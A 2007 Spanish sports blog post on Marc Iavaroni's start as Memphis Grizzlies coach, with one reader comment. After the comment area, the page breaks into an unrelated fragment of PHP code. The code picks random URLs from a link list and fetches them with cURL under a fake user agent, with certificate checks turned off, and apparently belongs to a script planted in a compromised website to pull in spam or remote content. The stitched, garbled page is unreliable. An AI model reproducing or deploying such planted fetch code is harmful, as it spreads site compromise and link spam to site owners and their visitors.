Pensando en verde (15/11): el huevo y la gallina

16 de November de 2007 por Jabho

Es lo que tienen los comienzos, que necesitan tiempo para asentarse. Me explico: si tienes un franquicia NBA y los resultados deportivos son malos, tu pabellón no se llena ni regalando entradas, has despedido al GM y tu estrella pide el traslado, lo mejor es que te plantees cambios. Y muchos. Eso debió pensar Michael Heisley, propietario de Memphis, tras la venta fallida de la franquicia el año pasado. Así que, manos a la obra: llegaron Chris Wallace como nuevo GM y Marc Iavaroni como entrenador.

Marc Iavaroni estrena su currículo en Memphis como entrenador jefe. La buena reputación conseguida tras cinco años de asistente de D´Antoni en los Suns le colocaban como candidato a dirigir varios equipos. Elegir a Iavaroni como entrenador es toda una declaración de intenciones a tus aficionados: run & gun.

Y aquí es de donde viene el dilema: ¿quién es más importante para el estilo de juego de los Suns, D´Antoni o Nash? Nash era un fantástico jugador en Dallas, pero su juego ha crecido hasta la categoría de superestrella amparado en un estilo que le favorece mucho. D´Antoni es el culpable de este estilo pero sin Nash los Suns pierden el norte.

Imagino que los aficionados de Memphis, acostumbrados a fratellos y hubbies browns se estarán frotando las manos con Iavaroni. Pero tiempo al tiempo. Superratón hace tiempo que dejo de ser súper y, en cualquier caso, no es Nash. Por no hablar de que Gasol y Milicic son más altos, más lentos y menos atléticos que Marion y Stoudemire, así que dificilmente correrán la pista como ellos.

A Iavaroni hay que darle tiempo para que cuadre una rotación consistente y un estilo juego que a la fuerza será mas lento que el de Suns. Tiene buenos jugadores a su disposición. A corto o medio plazo Lowry y Conley le quitarán el puesto a Stoudamire. Navarro debería ser el primer relevo en la alas (¿Jacobsen? venga, hombre…) de Rudy ‘tiro todo lo que cae en mis manos’ Gay y Mike ‘acomodado’ Miller. Y con Darko centrado, más Pau, tienes un juego interior de garantías.

Así que, resumiendo, que es gerundio, me quedo con tres ideas: la primera es que para Iavaroni es tiempo de ajustes pero tiene mimbres, así que esperemos que lo haga bien. La segunda es que hay 30 equipos NBA y 15 jugadores en cada equipo ¿alguien cree que no hay sitio para NBArro en esta liga?. La tercera es la respuesta al dilema de los Suns. Pues eso, el huevo y la gallina.

 

Comenta

Un comentario a esta entrada

  1. Viva_Dirk dice:
    #1

    Creo que todos pensamos que Navarro tiene sitio en la NBA, el debate llega cuando nos preguntamos cual es su sitio. Com 8º o 9º hombre es mi respuesta, jugando entre 10 y 15 minutos cuando las cosas transcurran de un modo normal, y a poder ser que no le toque defender a nadie que le pueda dejar en evidencia físicamente.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>